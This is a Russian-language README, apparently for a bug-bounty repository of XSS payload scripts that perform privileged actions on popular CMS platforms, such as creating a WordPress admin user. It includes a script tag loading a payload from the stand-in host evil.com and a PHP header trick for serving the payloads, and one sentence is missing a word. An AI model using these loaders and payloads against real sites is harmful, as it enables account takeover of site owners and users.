
XSS-пейлоады, предназначенные для превращения alert(1) в P1
XSS-пейлоады, созданные для превращения alert(1) в P1.
Этот репозиторий был опубликован вместе со статьёй под названием "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
В этом репозитории вы найдёте множество JavaScript-файлов, которые можно подключить в XSS-пейлоад для выполнения чувствительных функций на популярных CMS-платформах в контексте браузера жертвы. Это помогает превратить обычный XSS-баг во что-то более критичное, например, в захват учётной записи.
Это отлично подходит для повышения серьёзности отчёта о пентесте или bug bounty за счёт демонстрации реального влияния на безопасность.
Пейлоады добавляются постепенно, по мере наличия времени. Впереди ещё много новых — если вы можете помочь, pull request'ы приветствуются! Если вы ищете вдохновение для создания новых пейлоадов — загляните во вкладку "issues" этого репозитория.
Самый простой способ использования этих пейлоадов — разместить их где-нибудь и подключить в атрибут src тега script вашего XSS-пейлоада, например так:
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
В качестве альтернативы, в зависимости от контекста и длины пейлоада, его иногда можно , и затем просто включить напрямую в запрос.
Чтобы разместить JavaScript-файл, вам может потребоваться установить Content-Type в application/javascript. Для этого с помощью PHP можно просто добавить эту строку в начало любого из пейлоадов, сохранить его как .php-файл и разместить на вашем веб-сервере с поддержкой PHP:
<?php header("Content-Type: application/javascript"); ?>
Эта статья от Shift8 вдохновила меня на создание этого репозитория. В JS из статьи есть пара небольших опечаток, но концепции точны.